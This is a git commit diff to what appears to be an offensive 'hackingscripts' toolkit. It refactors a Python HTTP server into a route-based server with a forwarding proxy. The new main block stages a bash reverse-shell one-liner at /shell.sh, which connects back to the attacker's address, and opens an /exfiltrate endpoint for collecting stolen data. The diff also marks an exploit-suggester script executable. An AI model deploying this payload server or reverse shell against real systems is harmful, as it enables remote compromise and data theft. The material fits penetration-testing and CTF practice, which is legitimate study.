python webserver routes
This commit is contained in:
parent
1a4d7821f8
commit
2338077bd6
@ -3,6 +3,7 @@
|
|||||||
from hackingscripts import util
|
from hackingscripts import util
|
||||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||||
import threading
|
import threading
|
||||||
|
import requests
|
||||||
import sys
|
import sys
|
||||||
import os
|
import os
|
||||||
import ssl
|
import ssl
|
||||||
@ -15,13 +16,26 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
|||||||
def do_POST(self):
|
def do_POST(self):
|
||||||
self.do_GET()
|
self.do_GET()
|
||||||
|
|
||||||
|
def onForward(self, target):
|
||||||
|
queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
|
||||||
|
if queryStr:
|
||||||
|
target += "?" if "?" not in target else "&"
|
||||||
|
target += queryStr
|
||||||
|
|
||||||
|
method = self.command
|
||||||
|
res = requests.request(method, target)
|
||||||
|
return res.content, res.status_code
|
||||||
|
|
||||||
def do_GET(self):
|
def do_GET(self):
|
||||||
path = self.path if "?" not in self.path else self.path[0:self.path.find("?")]
|
|
||||||
if path in self.server.files:
|
path = self.server.cleanPath(self.path)
|
||||||
data = self.server.files[path]
|
if path in self.server.routes:
|
||||||
self.send_response(200)
|
data, code = self.server.routes[path](self)
|
||||||
|
self.send_response(code)
|
||||||
self.end_headers()
|
self.end_headers()
|
||||||
self.wfile.write(data)
|
|
||||||
|
if data:
|
||||||
|
self.wfile.write(data)
|
||||||
else:
|
else:
|
||||||
self.send_response(404)
|
self.send_response(404)
|
||||||
self.end_headers()
|
self.end_headers()
|
||||||
@ -42,34 +56,40 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
|||||||
|
|
||||||
def log_message(self, format, *args):
|
def log_message(self, format, *args):
|
||||||
if self.server.logRequests:
|
if self.server.logRequests:
|
||||||
# BaseHTTPRequestHandler.log_message(format, *args)
|
|
||||||
super().log_message(format, *args)
|
super().log_message(format, *args)
|
||||||
|
|
||||||
class HttpFileServer(HTTPServer):
|
class HttpFileServer(HTTPServer):
|
||||||
def __init__(self, addr, port):
|
def __init__(self, addr, port):
|
||||||
super().__init__((addr, port), FileServerRequestHandler)
|
super().__init__((addr, port), FileServerRequestHandler)
|
||||||
self.logRequests = False
|
self.logRequests = False
|
||||||
|
self.routes = { }
|
||||||
self.dumpRequests = []
|
self.dumpRequests = []
|
||||||
self.files = { }
|
|
||||||
|
def cleanPath(self, path):
|
||||||
|
|
||||||
|
if "?" in path:
|
||||||
|
path = path[0:path.find("?")]
|
||||||
|
|
||||||
|
if not path.startswith("/"):
|
||||||
|
path = "/" + path
|
||||||
|
|
||||||
|
return path.strip()
|
||||||
|
|
||||||
def addFile(self, name, data):
|
def addFile(self, name, data):
|
||||||
if isinstance(data, str):
|
if isinstance(data, str):
|
||||||
data = data.encode("UTF-8")
|
data = data.encode("UTF-8")
|
||||||
if not name.startswith("/"):
|
|
||||||
name = "/" + name
|
|
||||||
self.files[name.strip()] = data
|
|
||||||
|
|
||||||
def addFile(self, name, data):
|
# return 200 - OK and data
|
||||||
if isinstance(data, str):
|
self.addRoute(name, lambda req: (data, 200))
|
||||||
data = data.encode("UTF-8")
|
|
||||||
if not name.startswith("/"):
|
|
||||||
name = "/" + name
|
|
||||||
self.files[name.strip()] = data
|
|
||||||
|
|
||||||
def dumpRequest(self, name):
|
def dumpRequest(self, name):
|
||||||
if not name.startswith("/"):
|
self.dumpRequests.append(self.cleanPath(name))
|
||||||
name = "/" + name
|
|
||||||
self.dumpRequests.append(name)
|
def addRoute(self, path, func):
|
||||||
|
self.routes[self.cleanPath(path)] = func
|
||||||
|
|
||||||
|
def forwardRequest(self, path, target):
|
||||||
|
self.addRoute(path, lambda req: req.onForward(target))
|
||||||
|
|
||||||
def enableLogging(self):
|
def enableLogging(self):
|
||||||
self.logRequests = True
|
self.logRequests = True
|
||||||
@ -99,13 +119,27 @@ class HttpFileServer(HTTPServer):
|
|||||||
t.start()
|
t.start()
|
||||||
return t
|
return t
|
||||||
|
|
||||||
# EXAMPLE
|
def start(self):
|
||||||
|
return self.serve_forever()
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1])
|
if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]:
|
||||||
|
print("Usage: %s [shell,dump,proxy]" % sys.argv[0])
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
fileServer = HttpFileServer("0.0.0.0", 80)
|
||||||
ipAddress = util.getAddress()
|
ipAddress = util.getAddress()
|
||||||
|
|
||||||
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
if sys.argv[1] == "shell":
|
||||||
fileServer = HttpFileServer("0.0.0.0", 80)
|
listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
|
||||||
fileServer.addFile("shell.sh", rev_shell)
|
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
||||||
fileServer.startBackground()
|
fileServer.addFile("shell.sh", rev_shell)
|
||||||
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
||||||
|
elif sys.argv[1] == "dump":
|
||||||
|
fileServer.dumpRequest("/exfiltrate")
|
||||||
|
print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress)
|
||||||
|
elif sys.argv[1] == "proxy":
|
||||||
|
fileServer.forwardRequest("/proxy", "https://google.com")
|
||||||
|
print("Exfiltrate data using: http://%s/proxy" % ipAddress)
|
||||||
|
|
||||||
|
fileServer.start()
|
||||||
|
|||||||
0
linux-exploit-suggester.sh
Normal file → Executable file
0
linux-exploit-suggester.sh
Normal file → Executable file
Loading…
Reference in New Issue
Block a user